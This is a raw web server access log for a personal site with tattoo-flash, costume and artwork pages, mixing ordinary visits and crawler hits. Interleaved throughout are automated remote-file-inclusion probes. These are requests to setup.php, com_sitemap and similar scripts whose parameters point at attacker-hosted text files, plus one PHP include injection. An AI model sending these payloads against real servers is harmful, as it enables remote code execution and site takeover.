218.38.34.19 - - [04/May/2010:14:58:31 -0500] "GET /logs/access_log.1264550400//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:58:31 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:58:31 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
71.156.47.108 - - [04/May/2010:14:59:50 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://search.yahoo.com/search;_ylt=A0oGk0HYeuBLvToBHwRXNyoA?fr2=sg-gac&sado=1&p=vintage%20tattoo%20flash&fr=yfp-t-701-s&pqstr=vintage%20tat&gprid=dlrez5DDTA6njB7IaXRo_A&sac=1&sao=2""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.156.47.108 - - [04/May/2010:14:59:50 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
71.156.47.108 - - [04/May/2010:14:59:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
121.190.102.21 - - [04/May/2010:15:02:15 -0500] "GET /logs/access_log.1272067200%20%20//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:15:02:15 -0500] "GET /logs//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:15:02:15 -0500] "GET //?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:15:03:17 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [04/May/2010:15:03:57 -0500] "GET /logs/access_log.1272067200%20%20//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:15:03:57 -0500] "GET /logs//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:15:03:57 -0500] "GET //?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.190.102.21 - - [04/May/2010:15:05:32 -0500] "GET /logs/access_log.1212451200%20%20//?_PHPLIB[libdir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.142.162.26 - - [04/May/2010:15:06:16 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:16 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:16 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:16 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:19 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:19 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
67.142.162.26 - - [04/May/2010:15:06:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
218.38.34.19 - - [04/May/2010:15:07:15 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:15:07:15 -0500] "GET /logs/access_log.1265932800//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:15:07:15 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:15:07:15 -0500] "GET /logs/access_log.1264723200//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.222.56.62 - - [04/May/2010:15:09:21 -0500] "GET /logs/access_log.1237852800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
66.221.63.33 - - [04/May/2010:15:11:45 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 306 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:11:45 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 311 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:11:45 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 335 "-""Mozilla/5.0"
188.130.32.85 - - [04/May/2010:15:12:19 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
188.130.32.85 - - [04/May/2010:15:12:19 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
188.130.32.85 - - [04/May/2010:15:12:19 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:12:20 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 335 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:12:20 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 306 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:12:20 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:15:13:33 -0500] "GET /artwork/dressers.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
66.221.63.33 - - [04/May/2010:15:13:37 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 335 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:13:37 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 335 "-""Mozilla/5.0"
188.130.32.85 - - [04/May/2010:15:13:56 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:15:12 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 333 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:15:19 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 333 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:16:03 -0500] "GET /logs/access_log.1272067200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 333 "-""Mozilla/5.0"
66.221.63.33 - - [04/May/2010:15:16:08 -0500] "GET /logs/access_log.1272067200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 333 "-""Mozilla/5.0"
67.195.112.180 - - [04/May/2010:15:19:12 -0500] "GET /logs/access_log.1218067200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.141.2.7 - - [04/May/2010:15:19:31 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
114.141.2.7 - - [04/May/2010:15:19:31 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.141.2.7 - - [04/May/2010:15:19:31 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
188.130.32.85 - - [04/May/2010:15:21:01 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
114.141.2.7 - - [04/May/2010:15:21:53 -0500] "GET /logs/access_log.1272067200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
188.130.32.85 - - [04/May/2010:15:22:24 -0500] "GET /logs/access_log.1272067200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.13.142 - - [04/May/2010:15:22:53 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:15:28:14 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
184.73.75.129 - - [04/May/2010:15:29:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.75.129 - - [04/May/2010:15:29:34 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
207.46.204.187 - - [04/May/2010:15:40:24 -0500] "GET /logs/access_log.1213315200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:15:44:03 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.45 - - [04/May/2010:15:46:23 -0500] "GET /logs/access_log.1183852800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.49.100.254 - - [04/May/2010:15:47:22 -0500] "GET //?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:47:22 -0500] "GET /logs/access_log.1262822400//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:47:22 -0500] "GET /logs/access_log.1264032000//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:47:22 -0500] "GET /logs//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:48:00 -0500] "GET /logs//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:48:00 -0500] "GET /logs/access_log.1262822400//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:48:00 -0500] "GET //?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:48:00 -0500] "GET /logs/access_log.1264032000//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
71.239.236.212 - - [04/May/2010:15:48:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:09 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
207.46.13.140 - - [04/May/2010:15:48:23 -0500] "GET /logs/access_log.1160352000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
71.239.236.212 - - [04/May/2010:15:48:28 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:48:29 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
124.49.100.254 - - [04/May/2010:15:49:09 -0500] "GET //?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:49:09 -0500] "GET /logs/access_log.1264032000//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:49:09 -0500] "GET /logs//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4246 "-""Mozilla/5.0"
124.49.100.254 - - [04/May/2010:15:49:09 -0500] "GET /logs/access_log.1262822400//?p=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:15:49:41 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
